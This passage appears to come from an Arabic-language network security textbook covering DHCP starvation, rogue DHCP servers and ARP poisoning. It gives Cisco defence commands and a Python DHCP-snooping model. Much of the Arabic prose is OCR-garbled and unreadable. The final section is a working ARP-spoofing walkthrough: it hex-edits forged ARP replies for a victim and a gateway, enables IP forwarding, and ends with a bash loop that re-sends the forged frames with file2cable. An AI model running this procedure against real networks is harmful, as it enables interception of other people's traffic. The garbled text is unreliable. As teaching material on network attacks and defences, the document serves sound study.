[Figure: Rogue DHCP server attack. The client broadcasts DHCPDISCOVER (IPv4) / SOLICIT (IPv6); both the legitimate DHCP server and the rogue server answer with a unicast DHCPOFFER (IPv4) / ADVERTISE (IPv6); the client's broadcast DHCPREQUEST (IPv4) / REQUEST (IPv6) may go to the rogue server. Running a rogue DHCP server, an attacker sends incorrect TCP/IP settings:
Wrong Default Gateway -> Attacker is the gateway
Wrong DNS server -> Attacker is the DNS server
Wrong IP Address -> DoS with spoofed IP]



?Rogue Server cL^k j DHCP Starvation ±* £ti*M hL& 

DHCP Starvation *i £ti*M ^ 
DHCP J^jj 'u^j^' ^ MAC u^j^ i> c* 1 ^ Port security ^^^1 Jjjla ^ t*Ui ^1 

.Starvation 



Enable port security to defend against DHCP starvation attack

• Configuring a MAC limit on the switch's edge ports drops the packets from further MACs once the limit is reached

[Figure: user connected to an edge port of the switch with port security enabled]

IOS Switch Commands
switchport port-security
switchport port-security maximum 1
switchport port-security violation restrict
switchport port-security aging time 2
switchport port-security aging type inactivity
Rogue Servers ±* *k

ia.Ha <^ ^ DHCP snooping .DHCP snooping s Rogue DHCP servers <> < ^3l t 
DHCP ^ Jj^» jj ^ ls'^ DHCP Snooping ^ jfc <DHCP Rogue ±± ^liall J^S t> .lMl^ 

DHCP discover <>> ^ ^ JL? jSjjjjJI ^ ^ j^Vl iali*ll V -ola <DHCP Snooping ^] ^ .^L^ll 
jjll (jS-aj V -uli t^j^jjoJU l^Jaj jj DHCP Rogue Cy* o^-W-^ ^ Cy* 

.DHCP discover 



Enable DHCP snooping that allows the switch to accept DHCP transactions coming only from a trusted port

[Figure: the DHCP server sits behind the switch's trusted port; the user's port and the attacker's port are untrusted]

IOS Global Commands
ip dhcp snooping vlan 4,104                -> this is what VLANs to snoop
no ip dhcp snooping information option     -> this allows some DHCP options
ip dhcp snooping                           -> this turns on DHCP snooping
Note: All ports in the VLAN are not trusted by default
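As an added illustration (not the book's code) of what the two defences above do together, here is a small model of a switch running DHCP snooping on a constructed stream of DHCP events: server messages are accepted only from a trusted port, client messages on untrusted ports must carry a CHADDR equal to the frame's source MAC, a binding table is built from ACKs, and a port whose DISCOVERs come from more than an assumed number of distinct client MACs is flagged as a starvation source (standing in for the per-port rate limit a real switch applies). Port names, MACs and limits are assumptions.

```python
"""DHCP snooping and starvation detection on a constructed event stream.

Added example, not from the book: a model of the switch behaviour the slides
describe ('ip dhcp snooping' plus a per-port client limit). Port names,
addresses and the limit are assumptions made for the sample.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

SERVER_MSGS = {"OFFER", "ACK", "NAK"}


@dataclass(frozen=True)
class DhcpEvent:
    port: str          # ingress switch port
    msg: str           # DHCP message type
    chaddr: str        # client hardware address inside the DHCP payload
    src_mac: str       # Ethernet source MAC of the frame
    yiaddr: str = ""   # address offered/assigned (server messages only)


class DhcpSnooping:
    def __init__(self, trusted_ports: Set[str], max_clients_per_port: int = 5) -> None:
        self.trusted = set(trusted_ports)
        self.max_clients = max_clients_per_port
        self.bindings: Dict[str, Tuple[str, str]] = {}            # chaddr -> (ip, client port)
        self.client_port: Dict[str, str] = {}                      # chaddr -> port last seen on
        self.clients_seen: Dict[str, Set[str]] = defaultdict(set)  # port -> distinct CHADDRs
        self.alerts: List[str] = []

    def process(self, ev: DhcpEvent) -> bool:
        """Return True if the switch forwards the message, False if it drops it."""
        if ev.msg in SERVER_MSGS:
            if ev.port not in self.trusted:            # rogue server on an access port
                self.alerts.append(f"rogue server: {ev.msg} from {ev.src_mac} on untrusted {ev.port}")
                return False
            if ev.msg == "ACK" and ev.yiaddr:          # ACK on the trusted port creates a binding
                self.bindings[ev.chaddr] = (ev.yiaddr, self.client_port.get(ev.chaddr, "?"))
            return True
        if ev.port in self.trusted:                    # trusted ports are not inspected
            return True
        if ev.chaddr != ev.src_mac:                    # forged CHADDR (verify mac-address check)
            self.alerts.append(f"chaddr {ev.chaddr} != source MAC {ev.src_mac} on {ev.port}")
            return False
        if ev.msg in ("RELEASE", "DECLINE"):           # only the port holding the lease may end it
            bound = self.bindings.get(ev.chaddr)
            if bound and bound[1] != ev.port:
                self.alerts.append(f"{ev.msg} for {ev.chaddr} from wrong port {ev.port}")
                return False
        self.client_port[ev.chaddr] = ev.port
        seen = self.clients_seen[ev.port]
        seen.add(ev.chaddr)
        if len(seen) > self.max_clients:               # too many "clients" behind one port
            self.alerts.append(f"starvation suspected on {ev.port}: {len(seen)} distinct client MACs")
            return False
        return True


# Constructed sample: a normal lease on Gi0/5, then a rogue OFFER and a burst of
# DISCOVERs with forged client MACs on Gi0/7. Gi0/1 is the uplink to the real server.
SERVER_MAC = "00:11:22:33:44:55"
SAMPLE_EVENTS = [
    DhcpEvent("Gi0/5", "DISCOVER", "aa:bb:cc:00:00:01", "aa:bb:cc:00:00:01"),
    DhcpEvent("Gi0/1", "OFFER", "aa:bb:cc:00:00:01", SERVER_MAC, "10.10.10.2"),
    DhcpEvent("Gi0/5", "REQUEST", "aa:bb:cc:00:00:01", "aa:bb:cc:00:00:01"),
    DhcpEvent("Gi0/1", "ACK", "aa:bb:cc:00:00:01", SERVER_MAC, "10.10.10.2"),
    DhcpEvent("Gi0/7", "OFFER", "aa:bb:cc:00:00:01", "de:ad:be:ef:00:01", "10.10.10.200"),
] + [
    DhcpEvent("Gi0/7", "DISCOVER", f"02:00:00:00:00:{i:02x}", f"02:00:00:00:00:{i:02x}")
    for i in range(1, 5)
] + [
    DhcpEvent("Gi0/7", "DISCOVER", "02:00:00:00:00:09", "02:00:00:00:00:10"),
    DhcpEvent("Gi0/7", "RELEASE", "aa:bb:cc:00:00:01", "aa:bb:cc:00:00:01"),
]


def run_sample() -> Tuple[int, DhcpSnooping]:
    """Replay SAMPLE_EVENTS through a switch trusting only Gi0/1; return (forwarded count, switch)."""
    sw = DhcpSnooping(trusted_ports={"Gi0/1"}, max_clients_per_port=3)
    forwarded = sum(1 for ev in SAMPLE_EVENTS if sw.process(ev))
    return forwarded, sw


if __name__ == "__main__":
    count, switch = run_sample()
    print(f"forwarded {count} of {len(SAMPLE_EVENTS)} messages")
    for alert in switch.alerts:
        print("ALERT:", alert)
```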



8.4 ARP Poisoning



.ARP Poisoning ^ .DHCP Attacks j MAC Attacks :sniffing t> Cm® ^ <u^' c*^ 

J] j^Aj IP ^ j ARP cache J MAC u' cJj^*jj ^ j*j 6 ARP Poisoning ? j^a ^ 

CjLaaA j tdijjljVI a£jjoi C5 ic j a£jjoJI <J jll ^ia j t4 ml uiaJ) diL* jlx-<Jl Aijjoj ^1 g O^J t4 j vffll £>jA ^Ia^j mU j!-&j> 

■ < * > rTu<s\ \ ^L^Jj DOS 

cjU^a 4 ARP spoofing < «Vv^ <(ARP) (Address Resolution Protocol) u' Jj^ Jj^jjjjj ^\ ^ 
.ARP Poisoning ±± Jf^j 'ARP Poisoning < <ARP Poisoning c_>Ijjj^Ij ARP Spoofing 



?(ARP) l)I jWI ^! JArjj* ^ 

t> Jj^jj^ j ojj^I Jj^j^jj* address resolution protocol ^ ^ jt ARP JjSjjjjj 

CjV j£ jj jjj ^-jV j£ jj jjj u] .(Network layer) ^f^l J jj>jj j ^ ^-jV jj jjj ^j^- j^ jj jjj 

<jla a A£l±Ai <L^ala L_buj| j^Jl (jj^J U»JJC (j^Jj(llOSts) ^iLwJIj dil^jJall lAj^xj] (IP) Ajllalftll ^jjjlixJl Jc J>usu ClljjjjVl 

1^jLu£ ^iloj Ajlgill J C5 5Jaiall jl jjjJI Ajjj^J! dijjjjVI J j^ jj jjjj djUUJl Token Ring j» Ethernet 

jl jixJI ^j^Luj (data link layer) jVI iSJa cjVj^jjjjj q\ Ujj . JL- jVI ^ (data link layer) 
J j£ jjjjj ^j5j Uijj*i ,<j jj*Ji C5^^^ ( ; ^ ^'^ ^j>^j j j^-j ^j^I (Jc- ^jjujI j^J! lAj^xj] (MAC Address) 
jl j£-a-a jl ji*-ll J j^il ^jlgilt jll jl jJC j& ^ill ^jlgilt ^Uaill(JP) C5 lkl<Jl jl ji*-ll ^aisu CjULj 4-* *Ujj dujliVI

(illil (IP) ( t 5^Jalall jl ji*-ll ^aisu ClljjljVI (J J^J^ 4-L^.j-all j£Jj .<_£j^.l <£jjuj ^^Sc ^aUaj jl A-lla a <£jjuiJ J nala L-LujL^ 

g-jtO^ll jl jixJI Jl <^ jll(IP) ^Vii^l jl jiJI Jj^jj jl a> V a£jJJI jic JSjJI ^IjUxj Ethernet -SI ^jL ji JjS Jaia ^U^dl 

.(Data link layer) jVI ^LL J ^ v^ . n^ t (MAC Address) iptkil ujjUJI j (Network layer) 

jl (MAC address) j^ 1 u'jA*^ (IP) c^^ 1 u>>^ cJjjp^ lUs JjSjjjjj j* (ARP) ojj^I Jj£jhjjj 

.(Data link layer) JaLujVI iSJa (Network Layer) A^^dl aLL j* Jjj^I 

L_flJjJaxJl CjVI j 6(jjjjJjjoJ! j-a .^^> ^l J^-l-^ L^l L>* MAC J^" LS^" <-5 J> ^^^1 <U jg > nj C*I&aJ 4 Jj£jJ jjJl li& aIa^LuAj 

<Lg J^J^ U' ^ ^'^ c ' <■ fl^a^Sl jl^Jl J^* j^ ARP ^^"'J .MAC U^J^- ^ JJ^a^J] ARP J l Ju ^5' LqA^LujJ 

J jSI MAC (jl cJ^-l j-* j mJjaj^J! 4.* j^JI J j^W u^-^-SI MAC ul ul ( ♦ 1 >j J] 
Jj^JI J MAC cjlj^ <4> .ARP JjSjjjjj J^ i> ^j^l JU^I t> MAC utj^ ^^>s ul ' <j > ^ l jU^I 
MAC jlj^ J^ J ARP ik^l <J^I ^*ll ^ ^ b Jjju321I (Xhi Jja j^ J^ (ARP Jj^JI) 
IP ul J^^j f% .(datagram)^U? ^ ^ (Transport Layer) J^l IP -SI J*^ -1 

m <4+ jll IP Jl jl jj^ Jia. J <^ jll 

^iuij JUt jl£ lil a^iA jll IP jl J (Network Identifier)^f^-SI ^ j** <^ IP -SI -2 

A-l^. Jill J J^ J diUi jlstJl AAaJLoUjal IP Jl jli JJ jlj Jl Jiill aJJ > 0 jl£ lij ^AjI^aII A£jjai3l Jc JJ jl J Jl ^al jll 6JjoiU^ 

.cjUUJI ^j^. J^i^ jl ls'^ j' Jl IP ul ^j^il <i^a^(Routing Table) 
ci^ll IP JL^j .^^Ull J^jJI jl jjc JL^ J Juj jaII IP Jl jl jj^ j MAC ul lSj^. ARP IP -3 

.Ic. jli JjJ t a^U MAC (jl J^' J ^H^l *^ J^^SI L-bol^ a\\ CjUUJI <xi jaJ JUI Jjjluaxll IP jl jic c5j^J 

aLis y^li ^13 broadcast ^ U^j ^ Data Link Layer -SI <±M ARP-SI <>UiJt -4 

.(Jjoj jJI ^UjIojU a£jj^I J (j^aau^ J£ Jl Ig-SLoj jl jll ^jaJt cJli ^(broadcast) ^1) 

jJI Jli J JjflluJI/<^. jll IP jl jjc ^ <j ^j^aLJI IP jl jjc jjl% ^ j*jj ^ARP ^j^- *Sj^Sj asu 44£jJo3I J J^ -5 

flkJl IP ^UaJ V jl jJsJ! liA jl£ lil .^i^JI IP jl j^ Jia. CjU jl^ I jlij ARP -SI (-Jia Jy^un ^ Jl LAN J^ ^^aJI -6 

. JjujjJI jUa.1 jj^ ^alaJlj L_JUl 11a JaL^L ^jIj ^aUaJl jli 

J^jJI IP jl ^jouj ^UiJI ^jL .ARP Request J^ ^ ^UiJI IP ^Uaj ^>J3 lJ^JI IP jl jj^ jl£ lil -7 
MAC jl ^ ^ (ARP Reply) ARP-SI *4*S J ^ jllMAC j IP J^ Jj ARP ^ j^ lU>JI MAC j 

.lU j^SI MAC J^ J ^ u-*tiJI 

>L J^i3 Jbj^l jl jisJl Jaa. ^l^klojU L-jlkSl Jj ^Jl CJjojUJI Jl ARP J^ ^UaJl ^ JL -8 

jaJ l^JSl - gab Jjuj^J] JL jjall jl jisJl Jla. J *^ ji. jJl A a laJLujJj ARP -SI ( ; lilall J jJJ ^IS ^ Jl J laJI J^iluJJ ~9 

. JL^iVI ^ J3Jj <jjlkJI <^jJ I^ISjj ^ data link layer J ^UUjII 

uLuxJI f Lmui ^A-Ja aII 4 mi It Jp < jj jjj ^ J^^- cS^I J JIj-aJI J Jallld t Jj<n^lL ARP Jj^ JJ^ ^ 

I Jj LaS MAC L^J^J 'IP L^J^J 

HostName   IP               MAC
A          194.54.67.10     00:1b:48:64:42:e4
B          192.168.168.3    00-14-20-01-23-47

Sj^li J B t auu^u MAC d)l Jj? » ^ ^ ^ u^ ^ jl u^ ^ *^jl ^ B t %i^JI jli ^ ^^^11 ^ J^i jj| JjS 

Jl jlj^ J cj^j lil iAK ARP (ARP Cache) ^>ll aJ>2ll SjSI j 6- cS^ 11 ^ . (ARP cache) ARP^>1I 

jjjUc ^1 J jj^a jll ^^ic Sj^SlI A t auU^l j\i ttilli t^^Lk ,B L_flJjJaxJl £a SjjujU-o Jj^al jlill 1 g i£ tAii^joaJ ^1 Si MAC 

:c5 jU3l j^]| ^ Jl ^juiSI C5 ic jjiijjJaxJI J£ JLoij A < ^ hoSI . ARPJ j^jjj J^ c> B 4 <j>^^ MAC 
ja ^ MAC ub^j 194.54.67.10 u»j^» ^ ^(192.168.168.3) IP u»j^» s^^- j* c>
<JLojj3I d^a ^ jiaJ c_ASa -uja. JL-jU A L-LjjaJ! ^ jSj Ua tciL ^UJI MAC a' Cj\ -5 00:lb:48:64:42:e4 
,A ^i^aJI ^> (ARP Broadcast Request Packet) B < <j > ^ 1 j( ^j^? .B < <j > ^ 1 

aJLoj j JLoj jU b < ^jij t> ,4j ^UJI ARP cache ^ ^ J^ll MAC u' A ( IP il jj& ii^j I jja 
U! liA Jjii (ARP uncast Reply Packet) A * 1*1^ J ^1 ^ >JI ^ o jU^ uj^ ^ j 

.00:14:20:01:23:47 j* ^ u-UJI MAC u^j ^92.168.168.3 

ARP MAC (j' J B L fl^a^I] IP <jl jjc (JJJ AS^jlII J^jJ L_fl jjoi li^i 6 A t fl^a/ill lM* B t *°J 1 U <^ (j -0 ^iuit ^J^-aJ 

m (jiaxA\ ^ > ^>t j J-*^ ^UiJ 4 ^^jjjjVI <ijjja-<Jl s^_a.Vl £>i& ^jjj <JL^jV1 (JjjjjujIj i^l j a > <al ^ \l cache 



[Figure: ARP request/reply. Host A (IP 194.54.67.10, MAC 00:1b:48:64:42:e4): "I want to connect to 192.168.168.3, but I need its MAC address. I think I'll broadcast." ARP_REQUEST: "Hello, I need the MAC address of 192.168.168.3." The other hosts on the segment ignore the request. Host B (IP 192.168.168.3, MAC 00-14-20-01-23-47) answers ARP_REPLY: "I am 192.168.168.3, MAC address is 00-14-20-01-23-47." Connection established.]

^l.^i>nb cilUJI ^j! jjc t . ilia] ^^kjjoaj j t . lUali iARP request 

^jt ji*il (j-<i" t « ^ cJ^j^ ^jW^ f ' " q 192.168.1.5 L-i^.L^ j^-?> ^ cJ^^^ ^jW^ lP 3 ^)^ !cJ^ 

"192.168.1.5 

<j ^UJI ^j^l Sual\ J^jj j m jliaxJi ^ c^VI iiH^j ^ill jl^JI < jj>">'Q ^n^j <jU^jojVI >«l I^a :ARP response/Reply 

^ o-aUJl ^j^l cilUJlj ^ ^V! liA l^L^ Ul" ^jl^ <JU3! ajUI^V! JL-jU 192.168.1.5 JU^ 1 ^ 

"00:11:22:33:44:55 

aL p jjl cSSUll Jilk jx» ^ ^Vl ^ Jjj^JI ^ij dii^ jSl j JjVI j^l (joiij :RARP request 

mL> * j\ V^j y-j c^VI jl ^ tij^j ^ jSl j ^1511 <jUi^VI ^1 :RARP response/Reply 

*^ ^<J1 S^-^-Vl <JLujj lIj^j^ t° l!^^ 2!^^ ^ , ^ SLa 'ARP J cJ-^ ^ LLa^a ^jVl l!^?' 

^1 <J (j^aL^J! (JJJJ^l tilUJl (JLojjI J!>lk. (j-a <jL^JjujVU ^ajL jl^JI li^ iAjuz Jj^I jjll ^JJJ C^^l jig ^ H (JJJJ^^ (JC- ujJ 4£jjaJl 

tUjjobd IgJtxi Jj^al jjll ^aJ ^^jll ftj^VI ^^ic ^ jl^J ARP J i^C- iSj^i *^ j^"^^ C-!-^ ^J jaJ ^ .' e ^^ a (5^^ jW^^ 

cilLiA ^j^l j t(<J jAa. ^ jl^a. <L^1a3I ^LajIL hVi^j <jV) j Ki tti j ^^jIj ARP lSj^j^ j^>^ ^^^j ^ u*^^ 

! ! j^VI ^jta ^ lUjj <jI jJj CjSj ^1 ^ ARP response 
djUi (Jiiwj jl^aJI i^A j a£jJo3I ^ ± ja. ^ IgJLojjl j ARP response ^ u^j^ UjI£^\j <jl ^ 



ARP Spoofing Technique 

t«lli t> cJ^SI ;U .4_iL^3l JL^ijVI ^ ("Spoofed") j ARP j ^W^' ^ ARP spoofing 

IP u\j^\ ^ j^- cfi ^ '(default gateway J^) j^l ( <j > ^^ IP u*j^ ^ ^W^^ MAC u'j^ -^j 
jj^ll ^j^- flS j jl 6 jj^JI <£j^ lS^-^ j a\\ a£jJo31 Jc CjULiJI cjIjILI ^paljjcl ^ ^jj^I^aII ^ajuij ARP spoofing
< session hijacking<man in the middle 'denial of service <c£ ^ j^aJI li* ^ v^ ». n U Lllc. j .UUi 

MAC Flooding J 

.A-lla all A£jjoJ! ^laj Jc j - aJ3J j 4 (ARP) cJ.^*^ (J J^J^ L>* ' J^ CjI^JjoJI Jc Ja^a 4_x»l,Jjkjjuil (j£-aJ ^ ^ 

l$\ ."ARP Reply" J "ARP request" ? J^ ^ 4-^UJI ARP cache j -^h * j£j < Lu^l l jj j^SII 

(j^a (jj-a^ig-xJl (j£-*J Clii^ _4i^U^<Jl 4jUr. t . lilajj V ARP <J J^J^ U*^ ^^PH ARP L * C +Jy O^** 4_i1^a1I 4£jjuJI Jc 

jln^ll A£jjoJI jl L-flJjJaxJl (jlajsu ^jl <j£-aJj a jj-a ajLiScU (j-al£ll <Jlkll lifc aIa^LujI 

[Figure: ARP cache tables of PC01, PC02 and the router/gateway (10.0.0.4) in three cases: spoofing the host computer, spoofing the router/gateway, and spoofing both host and router/gateway. In each case the poisoned cache entries point the victim's IP addresses at the attacker's MAC.]



<ARP ^ lUjj JU^ 1 lA* J-uV ^ j ^1 jll (Sja^VI) MAC u 1 (Ji IP ou 1 ^ ^ ARP 

t^Jjl jll J .( ■ U^OjujJ L_fl jjoj ^£^11 jIa^JI A a Lfl (j-G ■ja^'iU 4_ljjaij (_£l ARP J^J^ *^ 'C**^ 1 ^ ^ ^ L>^ C5^^ ARP ^>f^s 

t> *^ j! jJl ARP Reply Jijp V ARP Request fJ ^1 Sja^VI J ^ ^ARP ^ ^1 J,^! <y* ApJ! 

JjJj 4jS> s ^ yr* J J J^ 1 J 1 (43 ' ^ Jl^V! ^1 J JU jl ^ ARP Table -SI J 

^Jc. j-<JI ARP Replay cJ^j^ ^JaLunj j^a 4^ jjl^ a\\ I^jj (J-g j jj jjj^II 13^^^ ^jUr> 

(jl jjc £d IP j (jjiaiijj I j^ilxj (jl AjauJaJI jIaj> jj-^.I^a1I jj^j j 6 ARP Tabled ARP ^U^c >^l 
^^L^L ^^31 ^ Jl broadcast ARP REPLY ^ u^W^ c?^ 1 MAC 

til iSijilb (j^aUJl Gateway -SI uj^ ^ c^^j IP ARP -SI Jj^- Jj^«j1I uj^ ^ 

<J ^ajlj <J£ (Jjl^xJl Aj^U (j>»j jJjjll (Jjlk^ll jlAJ> <jUllaj 4jUUj (JLojjU (JjI^aII jl^aJI I^JJ -j^Ui^U (j^J 

(Jjj^j* (j-a (j^j JUlUj 6 jIaj> l!^-^- Cy* ^ T J^> L - J ^W^I ^*^4 jjll Jj l^I ^j'qj'^SI \ -\ j Jl CjUUill 4^ jj o^lcl 

(jl (^^judjj (jl (jjl^ a\\ IxjJa j jj jjll Jl (jjlk-<Jl jl^Jl (j-d Jjl*ll tiljaljjl! 6^lj3 j S^aLuIa (j-a (j^JJ L-fl jjoj j 1VIIT1VI Jj 6 j^-A-^ 
m 4-i (j^aljkll jlfr^Jl IP j& (Jjj^aII jl $-\\\ JL jji3l (jl jjxll (jU £>UI UJjlxj jj jjll Jj j^.1 jj L_llla ci^JJ 
J£ J L-ic. jj ^l^xJI t JUl<JI Jc- .^j*^ J o^-^ o£ f j^' JalSslV ARP Poisoning ^Vi^t ^c^^ ^
ARP Reply JL-jl ^> t> ^ .192.168.1.25 <Jj\J\ jWj 492.168.1.21 Jj^ jjj-JI 

Jta^ .192.168.1.21 ^ J j^ 31 JU^ MAC u> JU^ J) (<i^ m 1 ^ ^ l& ^) ^> 

jjc. 4_laJjj tA-ia - tall jj jJJ<^ <*-flJ ARP Reply cJ-^J^ .A-ia - *all jj jj;^^ f ^ £ jj;^^ ^JJJ lal^J JJjl jJl 

l!&u!£ ^L^Jl 'I jpJ .j^jl jll j^j^^' ^ j^ > ^ 1 jU^ .192.168.1.25 ^ ^ <j-aUJI MAC 

Jj 4_pujJI jj jj^l! (> UUto Jll jjj* a£ ^1 JL-jV (IP FORWARD) IP sic] ^^^j* JjiJdl ^Ikj SJj* 

<i]U& (j-aj tA^I g all ^UaJ Jj <£jjai3l JJJ* (*J^ ^aUaill q\A tCjjjjjVI Jc- ^ j^. 4_i^jJa3l (jj^J L»,jjc. t^jVI . J^J^t 

q\A i Jji^Jl JJ jl jll j^-^- Jj JJ^>^ ^^P" *^lcj Jc ^.I^aII h^l (jl ^j^AJ , Jji^Jl JJ jl jll jt$J> J] ^ (SJ> JJ 6^lcl ^aJJ 

. JJJ^l CjI a\^\ ^jJal jll (J^aJjM Jc- 1— jjLdOJJ j A£jjoJ! JJJ-a 4-^J^> (j-ajJC-t ^ fO^ (S ^ L)\ *^ A-l^jJa3l 

t> u^j^ $ j^j ^ .a£j^3I (Jiijj^ lJ^j j3Ij ARP cache poisoning MAC flooding 

cjI jj^ (jjjfla^ ^ J^iJixi ^jijjjjjaJI ^jj^aj <hub J ."hub" ^^j 3 ^ Jj j^*^ u^j^^ u!^ J W^' 

.4£jjaJ! J JJ JJJ-^ (J^ Jj A^f^l JJJ^ ^^>^ **— ^ 6 J^^J 

a£j^. Jc. cib^jjll ^ j£ dj Ua ^j-<i j CjLujjjjjaJI ^j-<i •^• j * 3 ^(overload) (j^ j^-J ^ ^ <qj ^j>1^-<JI ^jli ^Jmb JiLd ^jjjjoJI cJ-^s ^ ij ^ c ' 

.^ KTi^ t ARP Reply u^j^^ o- 3 ^^ ARP Jj^ j^j c> 

^ARP Spoofing J^u uLS 

Source: http://trapezenetworks.com/us/en
^ j '(broadcast domain) 2 ^^3i J ^ ^ v^m* ^ ^Luk ^ jj^ ^^i^ I^jj ARP Spoofing ^ 
u j^^^ t . MACu'j^ cU^i i^Ji^l IP u'j^ ^^^^^ ARP Request y± (broadcast) ^ 

JJ 'ARP Request ^ J^ uj^ c> J 3 ^ (broadcast domain) 2 ^^3t J^ di^iil! 

,L_flj j-<i ]MAC ^" Ui ^ . J^j-^^ 

Jj jjj^JI c> MAC u'j^ c^j^ c> ^ ARP Spoofing .^jk\ LAN ^V-j j* ARP Spoofing 

jj> ARP Request ^ ARP cache cf ^ ^ u^j j^j^f^ MAC u'j^ 

CjjjUaVI lS^-^ g ^ ^j£-aj ciiia jj* jjj^II Jj cjljUaj J^j^ L_fl^JI jj jjj^II <jl£ 4 jj ARP Reply ^^>^ AJ 

JaJj ^J jla ^jC DoS r* L>*^ ^ti ttilli Jj AiLjaVlj .iajuJ jll J C-l^-J ^ J ^>^^ J^ ^ ^ 1 >1 jj (J^ 

C5 3 ! ^e^j^ c>j passive jjj^^ ru ^ v l: ^ J Gateway ^ o-^UJI IP JJ MAC u' 

.Ai^luuJI <^j> jll Jj ^UVl 




[Figure: ARP spoofing in a Layer 2 broadcast domain. When user A initiates a session with user B in the same Layer 2 broadcast domain, an ARP request is broadcast using user B's IP address and user A waits for user B to respond with a MAC address. User A sends the ARP request; the switch broadcasts it; the actual legitimate user B responds. A malicious user eavesdrops on this unprotected Layer 2 broadcast domain and can respond to the broadcast ARP request, replying to user A by spoofing user B's MAC address. The malicious user eavesdrops on the ARP requests and responses and spoofs as the legitimate user: information for IP address 10.1.1.1 is now being sent to MAC address 9:8:7:6:5:4 (the attacker).]
jW lJ\ ARP Reply jj ^W*^ 6 JlS^Vl <> ^L? ji ARP Reply c> (i^ll ^ ^ ^ j
c> jjj^' ^l&J (jSai <ARP cache .W-l ARP cache ^ <3 j^ > ^ l 



ARP POISONING 6- ^1^1
ARP Poisoning

[Figure: Using fake ARP messages, an attacker can divert all communications between two machines so that all traffic is exchanged via his/her PC.]




ARP Spoofing With Hard Way 

^UjU tillij Jjt ::;\\\ ^tk> J^U AlajUL ARP Spoofing jy\ ^Jsi 

ARP Request -^t&ll c> ^ f .o^j^ ls^- Gateway ^ j 3 j^ > ^ 1 jjj jj><J1 lallilU ^ j£j 

(JLujjI S^lcL jll L_fl jjuj tiljli 4DJJ^)^J ^^)^AJ ^Ljl^l L-buJ ill HEX J^)^ 0 f ^ .WiFCSliaFk ^"^^ 4_Iajull 

.c_jU3I 11a U^V wireshark ^ ^ j£j .file2cable fl^iul? a£jj^3I <u j^JI 

■HEX jj^ 'cK^ cP! 'ARP Reply 4^ 





[Screenshot: Wireshark with display filter "arp", showing the captured ARP reply from the gateway to the attacker's machine]

Ethernet II, Src: Thomson_23:d4:e6 (00:90:d0:23:d4:e6), Dst: Foxconn_27:69:7f (00:15:58:27:69:7f)
Address Resolution Protocol (reply)
    Hardware type: Ethernet (0x0001)
    Protocol type: IP (0x0800)
    Hardware size: 6
    Protocol size: 4
    Opcode: reply (0x0002)
    Sender MAC address: Thomson_23:d4:e6 (00:90:d0:23:d4:e6)
    Sender IP address: 192.168.2.1 (192.168.2.1)
    Target MAC address: Foxconn_27:69:7f (00:15:58:27:69:7f)
    Target IP address: 192.168.2.102 (192.168.2.102)
Frame (frame), 42 bytes
;Jtt\ laaiU HEX JJ~Jt 6- ^JJJ JJ>^t l£U 6*

ARP packet Destination: 00:15:58:27:69:7f 
ARP packet Source: 00:90:d0:23:d4:e6 
Sender MAC address 00:90:d0:23:d4:e6 
Sender IP address 192.168.2.1 (cO a8 02 01) 













[Screenshot: the captured ARP reply opened in a hex editor]

00000000  00 15 58 27 69 7F 00 90 D0 23 D4 E6 08 06 00 01   ..X'i....#......
00000010  08 00 06 04 00 02 00 90 D0 23 D4 E6 C0 A8 02 01   .........#......
00000020  00 15 58 27 69 7F C0 A8 02 66 00 00 00 00 00 00   ..X'i....f......
00000030  00 00 00 00 00 00 00 00 00 00 00 00 02 F8 BB 83   ................

Figure 29 - Editing the ARP Reply in a Hex Editor
.^31 1> ARP Spoofing ^ HEX iSi* <> ? 'ARP Reply ulS oVl - 
Gateway: 192.168.2.1 00:90:D0:23:D4:E6 
Attacker: 192.168.2.102 00:15:58:27:69:7F 
Victim: 192.168.2.111 00:14:85:24:26:15 

Victim Packet -1 

(jl _ji*J (JjILJI ja -^-^ all MAC u' jj^ -^jc^U i ^-l^k J jLsj i_i (Victim Packet) ' ^1 ^ j- 0 ^ <<« jaJI 
ARP Reply > o 3 ^^ 4^ «^ ^ .(192.168.2.1) ^Ij^Vi Gateway JW u-Lkll IP 

: ? ja4Jt JjS Aja^all j^. ^fe ARP Cache 



C:\WINDOWS\system32\cmd.exe

C:\>arp -a

Interface: 192.168.2.111 0x10005
  Internet Address      Physical Address      Type
  192.168.2.1           00-90-d0-23-d4-e6     dynamic
  192.168.2.102         00-15-58-27-69-7f     dynamic





[Screenshot: the edited reply (victim packet) in a hex editor, Konsole shell]

00000000  00 14 85 24 2B 15 00 15 58 27 69 7F 08 06 00 01   ...$+...X'i.....
00000010  08 00 06 04 00 02 00 15 58 27 69 7F C0 A8 02 01   ........X'i.....
00000020  00 14 85 24 2B 15 C0 A8 02 6F 00 00 00 00 00 00   ...$+....o......
00000030  00 00 00 00 00 00 00 00 00 00 00 00 02 F8 BB 83   ................







\<JN\£ ARP Cache CjVU^I ajJ <±*ujal) jl^ ^li <file2cable ^v^l? a^u^W J] jaJI ^ JL^j) 
C:\WINDOWS\system32\cmd.exe

Interface: 192.168.2.111 0x10005
  Internet Address      Physical Address      Type
  192.168.2.1           00-90-d0-23-d4-e6     dynamic
  192.168.2.102         00-15-58-27-69-7f     dynamic

C:\>arp -a

Interface: 192.168.2.111 0x10005
  Internet Address      Physical Address      Type
  192.168.2.1           00-15-58-27-69-7f     dynamic
  192.168.2.102         00-15-58-27-69-7f     dynamic

C:\>_



MAC u' uVl gateway y> p% c?' '^j^VI ^> liL^j J&i ARP cache J^) 

Gateway Packet -2 

4_i^jja3! ^Uail ^aj^LxJI j-^ Gateway ^J-^ ^l^s .Gateway ^3^- e^^j J] 

ic^Vl* HEX jj^ fl^l^L JjAxll! J^k <> tiUij t^l^Jlj o-^UJI MAC u 1 



[Screenshot: the gateway packet in a hex editor]

00000000  00 90 D0 23 D4 E6 00 15 58 27 69 7F 08 06 00 01   ...#....X'i.....
00000010  08 00 06 04 00 02 00 15 58 27 69 7F C0 A8 02 6F   ........X'i....o
00000020  00 90 D0 23 D4 E6 C0 A8 02 01 00 00 00 00 00 00   ...#............
00000030  00 00 00 00 00 00 00 00 00 00 00 00 02 F8 BB 83   ................





:Gateway ^ u^j <4j 



root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward



Then create the script arp-poison.sh, which re-sends both frames every two seconds. ARP cache entries expire and are refreshed by genuine replies from the real hosts, so the poisoning must be repeated continuously:

#!/bin/bash
# Re-send both forged ARP replies every 2 seconds so the poisoned
# entries in the victim's and the gateway's ARP caches do not expire.
while true; do
    file2cable -i eth0 -f arp-victim
    file2cable -i eth0 -f arp-gateway
    sleep 2
done

